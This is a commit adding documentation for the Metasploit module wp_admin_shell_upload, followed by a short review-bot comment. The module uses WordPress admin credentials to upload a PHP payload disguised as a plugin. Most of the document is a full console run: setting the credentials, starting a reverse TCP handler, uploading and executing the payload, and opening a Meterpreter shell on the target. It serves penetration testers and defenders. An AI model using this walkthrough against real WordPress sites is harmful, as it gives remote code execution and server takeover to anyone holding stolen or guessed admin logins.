
Commit 47e5f90

Add docs for wp_admin_shell_upload
1 parent 227c0f7 commit 47e5f90

File tree

1 file changed

+51
-0
lines changed
@@ -0,0 +1,51 @@
1+
## Vulnerable Application
2+
3+
This module takes an administrator username and password, logs into the
4+
admin panel, and uploads a payload packaged as a WordPress plugin.
5+
Becuase this is authenticated code execution by design, it should work
6+
on all versions of WordPress.
7+
8+
### Vulnerable Application Installation
9+
10+
You can get WordPress from [https://wordpress.org/download/](https://wordpress.org/download/)
11+
or from some Linux package managers. [Debian maintains an installation
12+
guide](https://wiki.debian.org/WordPress) that also works on Ubuntu.
13+
Note that in a default install of WP from apt, the plugins directory is
14+
owned by root, so unless you chown it to the web user, this module will
15+
not work. Doing so is common in real-world deployments to allow
16+
legitimate administrators to install plugins, so it is not unreasonable
17+
for your own installation.
18+
19+
20+
## Verification steps
21+
22+
```
23+
msf > use exploit/unix/webapp/wp_admin_shell_upload
24+
msf exploit(wp_admin_shell_upload) > set USERNAME admin
25+
USERNAME => admin
26+
msf exploit(wp_admin_shell_upload) > set PASSWORD password
27+
PASSWORD => password
28+
msf exploit(wp_admin_shell_upload) > set TARGETURI /wp/
29+
TARGETURI => /wp/
30+
msf exploit(wp_admin_shell_upload) > run
31+
32+
[*] Started reverse TCP handler on 0.0.0.0:4444
33+
[*] Authenticating with WordPress using admin:password...
34+
[+] Login successful
35+
[+] Authenticated with WordPress
36+
[*] Preparing payload...
37+
[*] Uploading payload...
38+
[*] Acquired a plugin upload nonce: afa507398f
39+
[*] Uploaded plugin iHNhrYLmGR
40+
[*] Executing the payload at /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php...
41+
[*] Sending stage (33986 bytes) to 192.168.100.131
42+
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.131:40039) at 2017-04-21 11:36:33 -0500
43+
[+] Deleted DcrpFXPOCG.php
44+
[+] Deleted iHNhrYLmGR.php
45+
46+
meterpreter > pwd
47+
/var/lib/wordpress/wp-content/plugins/iHNhrYLmGR
48+
meterpreter >
49+
```
50+
51+
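Review bot: "Becuase" in the line "Becuase this is authenticated code execution by design, it should work" should read "Because". A second point on the sample run: the output ends with "[+] Deleted DcrpFXPOCG.php" and "[+] Deleted iHNhrYLmGR.php", yet the following `pwd` still reports /var/lib/wordpress/wp-content/plugins/iHNhrYLmGR, so the text should say whether the generated plugin directory itself is removed during cleanup or is left behind for the operator to delete; a sentence on what remains on disk after the session closes would help anyone checking for leftover artifacts after an engagement. Minor: the fenced block under "Verification steps" has no language tag.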
